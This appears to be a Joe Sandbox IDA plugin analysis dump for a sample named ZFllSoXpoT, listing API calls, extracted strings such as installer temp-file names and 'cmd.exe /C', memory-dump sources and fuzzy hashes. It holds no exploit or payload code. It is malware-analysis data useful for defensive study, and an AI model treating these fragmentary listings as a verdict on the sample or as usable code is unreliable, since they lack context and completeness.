                                                                            • Instruction ID: c8b20579a229f032ee7a03b4d787949f367ffe63dd75f0d430c9c3a529dbdbac
                                                                            • Opcode Fuzzy Hash: f8f7b9d3de02a5f634ff8a39374b78efb95d56f414cac3a76e6abeb800e2fe0e
                                                                            • Instruction Fuzzy Hash: 813172B17402006AEB10AF65AC82F6B36989B14308F10017BFA40AE2D3C6BDDD40876D

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2646 4674ec-467596 call 41462c call 41464c call 41462c call 41464c SHGetFileInfo 2655 4675cb-4675d6 call 478d20 2646->2655 2656 467598-46759f 2646->2656 2661 467627-46763a call 47cff4 2655->2661 2662 4675d8-46761d call 42c40c call 40357c call 403738 ExtractIconA call 46742c 2655->2662 2656->2655 2658 4675a1-4675c6 ExtractIconA call 46742c 2656->2658 2658->2655 2668 46763c-467646 call 47cff4 2661->2668 2669 46764b-46764f 2661->2669 2684 467622 2662->2684 2668->2669 2671 467651-467674 call 403738 SHGetFileInfo 2669->2671 2672 4676a9-4676dd call 403400 * 2 2669->2672 2671->2672 2680 467676-46767d 2671->2680 2680->2672 2683 46767f-4676a4 ExtractIconA call 46742c 2680->2683 2683->2672 2684->2672
                                                                            APIs
                                                                            • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046758F
                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 004675B5
                                                                              • Part of subcall function 0046742C: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 004674C4
                                                                              • Part of subcall function 0046742C: DestroyCursor.USER32(00000000), ref: 004674DA
                                                                            • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 0046760C
                                                                            • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 0046766D
                                                                            • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467693
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                            • String ID: c:\directory$k H$shell32.dll
                                                                            • API String ID: 3376378930-433663191
                                                                            • Opcode ID: 29e72a9552dfdc2cbc6caa590d21046d5f8b548d470bab6826c497dca36ee432
                                                                            • Instruction ID: 265839c963417482dd86c951db209f81288bb0a388fd09f062db7983cc26d63d
                                                                            • Opcode Fuzzy Hash: 29e72a9552dfdc2cbc6caa590d21046d5f8b548d470bab6826c497dca36ee432
                                                                            • Instruction Fuzzy Hash: B2516070604604AFDB10EF69CD89FDFB7E8EB48318F1081A6F9049B391D6399E81CA59

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 2688 42f570-42f57a 2689 42f584-42f5c1 call 402b30 GetActiveWindow GetFocus call 41eeb4 2688->2689 2690 42f57c-42f57f call 402d30 2688->2690 2696 42f5d3-42f5db 2689->2696 2697 42f5c3-42f5cd RegisterClassA 2689->2697 2690->2689 2698 42f662-42f67e SetFocus call 403400 2696->2698 2699 42f5e1-42f612 CreateWindowExA 2696->2699 2697->2696 2699->2698 2701 42f614-42f658 call 42428c call 403738 CreateWindowExA 2699->2701 2701->2698 2707 42f65a-42f65d ShowWindow 2701->2707 2707->2698
                                                                            APIs
                                                                            • GetActiveWindow.USER32 ref: 0042F59F
                                                                            • GetFocus.USER32 ref: 0042F5A7
                                                                            • RegisterClassA.USER32(004997AC), ref: 0042F5C8
                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F69C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F606
                                                                            • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F64C
                                                                            • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F65D
                                                                            • SetFocus.USER32(00000000,00000000,0042F67F,?,?,?,00000001,00000000,?,00458696,00000000,0049B628), ref: 0042F664
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                            • String ID: TWindowDisabler-Window
                                                                            • API String ID: 3167913817-1824977358
                                                                            • Opcode ID: b2433ce4ffe1b1f942b14f487daced2f86516ced4add7bc415a00a8a37101852
                                                                            • Instruction ID: 092f1afd63313efa57bcf667ad1f00c9caddf595d34af2871f870ebe591ae418
                                                                            • Opcode Fuzzy Hash: b2433ce4ffe1b1f942b14f487daced2f86516ced4add7bc415a00a8a37101852
                                                                            • Instruction Fuzzy Hash: 20219F70740710BAE710EF62AD03F1A76A8EB04B04FA1413AF504AB2D1D7B96D5586ED
                                                                            APIs
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                            • API String ID: 1646373207-2130885113
                                                                            • Opcode ID: c24ac2f37dcd2c5f05e81832aa1b687e7eaf3d26bd242744e205e68ddaa02280
                                                                            • Instruction ID: 5e931287d6eebe3694b70f0ad3549e6df422da746536320e83a51589c54bb73f
                                                                            • Opcode Fuzzy Hash: c24ac2f37dcd2c5f05e81832aa1b687e7eaf3d26bd242744e205e68ddaa02280
                                                                            • Instruction Fuzzy Hash: 5B017570240B45AFD711AF73AD02F167658E705B57F6044BBFC0096286D77C8A088EAD
                                                                            APIs
                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C893
                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C89C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateDirectoryErrorLast
                                                                            • String ID: Created temporary directory: $REGDLL_EXE$\_RegDLL.tmp$\_setup64.tmp$_isetup
                                                                            • API String ID: 1375471231-1421604804
                                                                            • Opcode ID: 20565183d399805a0260eecee190a14380a82a44589236b9bd3091d604848e13
                                                                            • Instruction ID: 2e7cf1fa8793a22cdcb7cccf6aa375e82942df810c5d1ff78a46bc34c798803d
                                                                            • Opcode Fuzzy Hash: 20565183d399805a0260eecee190a14380a82a44589236b9bd3091d604848e13
                                                                            • Instruction Fuzzy Hash: 65411474A001099BDB00EFA5D8C2ADEB7B9EB44309F50857BE91477392DB389E058B69
                                                                            APIs
                                                                            • RegisterClipboardFormatA.USER32(commdlg_help), ref: 00430958
                                                                            • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 00430967
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00430981
                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 004309A2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ClipboardFormatRegister$AtomCurrentGlobalThread
                                                                            • String ID: WndProcPtr%.8X%.8X$commdlg_FindReplace$commdlg_help
                                                                            • API String ID: 4130936913-2943970505
                                                                            • Opcode ID: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
                                                                            • Instruction ID: fe08fc0df2a0eca0a869f0df0621173a2940aa0bc2523ddfe777e35bb070d714
                                                                            • Opcode Fuzzy Hash: 78856a4ce41e30232f7250bb6d0de12fd7185dbc6f50e75004d9522d85a73123
                                                                            • Instruction Fuzzy Hash: 30F082B0958340CEE300EB25994271A7BE0EF58318F00467FF498A63E2D7399900CB5F
                                                                            APIs
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 00472591
                                                                            • FindClose.KERNEL32(000000FF,004725BC,004725B5,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004725AF
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951), ref: 004726B3
                                                                            • FindClose.KERNEL32(000000FF,004726DE,004726D7,?,00000000,?,0049C1D0,00000000,00472783,?,00000000,?,00000000,?,00472951,?), ref: 004726D1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Find$CloseFileNext
                                                                            • String ID: "*G$"*G
                                                                            • API String ID: 2066263336-450946878
                                                                            • Opcode ID: 731f9d001d9b8b0b4781793d64753bce726ea54262d8f8a63928cd792b5168e5
                                                                            • Instruction ID: 3872decae14ce2498a692a517acaa1cf84d86a609609514027ee2c14d85ef847
                                                                            • Opcode Fuzzy Hash: 731f9d001d9b8b0b4781793d64753bce726ea54262d8f8a63928cd792b5168e5
                                                                            • Instruction Fuzzy Hash: 6CB13E7490424DAFCF11DFA5C981ADEBBB9FF49304F5081AAE808B3251D7789A46CF58
                                                                            APIs
                                                                            • GetLastError.KERNEL32(?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218,00000000), ref: 004551A6
                                                                            • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00000080,COMMAND.COM" /C ,?,00455218,00455218,00000031,00455218), ref: 004551B3
                                                                              • Part of subcall function 00454F68: WaitForInputIdle.USER32(00000001,00000032), ref: 00454F94
                                                                              • Part of subcall function 00454F68: MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 00454FB6
                                                                              • Part of subcall function 00454F68: GetExitCodeProcess.KERNEL32(00000001,00000001), ref: 00454FC5
                                                                              • Part of subcall function 00454F68: CloseHandle.KERNEL32(00000001,00454FF2,00454FEB,?,00000031,00000080,00000000,?,?,0045534B,00000080,0000003C,00000000,00455361), ref: 00454FE5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandleWait$CodeErrorExitIdleInputLastMultipleObjectsProcess
                                                                            • String ID: .bat$.cmd$COMMAND.COM" /C $D$cmd.exe" /C "
                                                                            • API String ID: 854858120-615399546
                                                                            • Opcode ID: 2fd3dae9d75497d44160d5c5904f03d0a65dfeb3736f9e9635dbb4a286748838
                                                                            • Instruction ID: 314af404618b4f06b129018ed763823481dfe4f790e250d6c958622b2bfe97d6
                                                                            • Opcode Fuzzy Hash: 2fd3dae9d75497d44160d5c5904f03d0a65dfeb3736f9e9635dbb4a286748838
                                                                            • Instruction Fuzzy Hash: 12515A30A0074DABDB11EF95C892BEEBBB9AF44705F50407BB804B7282D7785A49CB59
                                                                            APIs
                                                                            • LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                            • OemToCharA.USER32(?,?), ref: 0042376C
                                                                            • CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Char$FileIconLoadLowerModuleName
                                                                            • String ID: 2$MAINICON
                                                                            • API String ID: 3935243913-3181700818
                                                                            • Opcode ID: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
                                                                            • Instruction ID: fd9f9c5161a85cdd37c149357dc6ae372d2e201a3957992c444bec056041847b
                                                                            • Opcode Fuzzy Hash: 751299a27fb29773dc730031d78ffe09a982dc500c90bea8db2431fb333e9452
                                                                            • Instruction Fuzzy Hash: 89319270A042549ADF14EF2998857C67BE8AF14308F4441BAE844DB393D7BED988CB99
                                                                            APIs
                                                                            • GetCurrentProcessId.KERNEL32(00000000), ref: 00418F4D
                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418F6E
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00418F89
                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 00418FAA
                                                                              • Part of subcall function 004230D8: 7427A570.USER32(00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 0042312E
                                                                              • Part of subcall function 004230D8: EnumFontsA.GDI32(00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000,?,?,?,00000001), ref: 00423141
                                                                              • Part of subcall function 004230D8: 74284620.GDI32(00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423149
                                                                              • Part of subcall function 004230D8: 7427A480.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,00423078,00410660,00000000,?,?,00000000,?,00418FE3,00000000), ref: 00423154
                                                                              • Part of subcall function 0042369C: LoadIconA.USER32(00400000,MAINICON), ref: 0042372C
                                                                              • Part of subcall function 0042369C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 00423759
                                                                              • Part of subcall function 0042369C: OemToCharA.USER32(?,?), ref: 0042376C
                                                                              • Part of subcall function 0042369C: CharLowerA.USER32(?,00400000,?,00000100,00400000,MAINICON,?,?,?,00418FF6,00000000,?,?,?,00000001), ref: 004237AC
                                                                              • Part of subcall function 0041F128: GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                              • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                              • Part of subcall function 0041F128: LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                              • Part of subcall function 0041F128: SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                              • Part of subcall function 0041F128: GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$7427AtomCharCurrentErrorGlobalLoadMode$74284620A480A570EnumFileFontsIconLibraryLowerModuleNameProcessThreadVersion
                                                                            • String ID: ControlOfs%.8X%.8X$Delphi%.8X
                                                                            • API String ID: 455100837-2767913252
                                                                            • Opcode ID: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
                                                                            • Instruction ID: 147b0fd3ac44816fa50e213e98ef70cab9cb63b371fef283777c7ccc396f8742
                                                                            • Opcode Fuzzy Hash: cfc1acdfd4e85ff2d131a9f4d40f785a7290ab9aa4a67b06bd919a79267a8431
                                                                            • Instruction Fuzzy Hash: BB112EB06142409AC740FF76A94265A7BE1DB64318F40843FF448EB2D1DB7D99448B5F
                                                                            APIs
                                                                            • SetWindowLongA.USER32(?,000000FC,?), ref: 00413674
                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 0041367F
                                                                            • GetWindowLongA.USER32(?,000000F4), ref: 00413691
                                                                            • SetWindowLongA.USER32(?,000000F4,?), ref: 004136A4
                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136BB
                                                                            • SetPropA.USER32(?,00000000,00000000), ref: 004136D2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$Prop
                                                                            • String ID:
                                                                            • API String ID: 3887896539-0
                                                                            • Opcode ID: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                            • Instruction ID: 955d73ee8c9e489f8eb805393a0cdbf9fe7b6d9765079e051d97cf620cdedb95
                                                                            • Opcode Fuzzy Hash: 45c1895276da90ba0030b8fba909c80b6c0b360e03c75fbe878fc1f19dddecee
                                                                            • Instruction Fuzzy Hash: D811C975500248BFDB00DF9DDC84EDA3BE8EB19364F144666B918DB2A1D738DD908BA8
                                                                            APIs
                                                                              • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,0045585B,?,00000000,0045589B), ref: 004557A1
                                                                            Strings
                                                                            • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455724
                                                                            • PendingFileRenameOperations, xrefs: 00455740
                                                                            • PendingFileRenameOperations2, xrefs: 00455770
                                                                            • WININIT.INI, xrefs: 004557D0
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseOpen
                                                                            • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager$WININIT.INI
                                                                            • API String ID: 47109696-2199428270
                                                                            • Opcode ID: e596244eac119ca3746a9610a602a7bde82fbf058035d963e90b8d4b6900848c
                                                                            • Instruction ID: 5ff55985f0d79b0cf99ef6a0ef0ae12f56fe6c83aec1de8438bfb9543cdeefde
                                                                            • Opcode Fuzzy Hash: e596244eac119ca3746a9610a602a7bde82fbf058035d963e90b8d4b6900848c
                                                                            • Instruction Fuzzy Hash: BB519670E006089FDB10FF61DC51AEEB7B9EF45305F50857BE804A7292DB7CAA49CA58
                                                                            APIs
                                                                            • EnumWindows.USER32(00423A2C), ref: 00423AB8
                                                                            • GetWindow.USER32(?,00000003), ref: 00423ACD
                                                                            • GetWindowLongA.USER32(?,000000EC), ref: 00423ADC
                                                                            • SetWindowPos.USER32(00000000,lAB,00000000,00000000,00000000,00000000,00000013,?,000000EC,?,?,?,004241BB,?,?,00423D83), ref: 00423B12
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnumLongWindows
                                                                            • String ID: lAB
                                                                            • API String ID: 4191631535-3476862382
                                                                            • Opcode ID: 5f05c18b5ef50282e2e62587cef3ede3e0bfa46b8e8bdba155623c697b582535
                                                                            • Instruction ID: 20c146af1fa2ebf8fe73d6cd857ce812a249192cdefe4c29475ac4fba41381ea
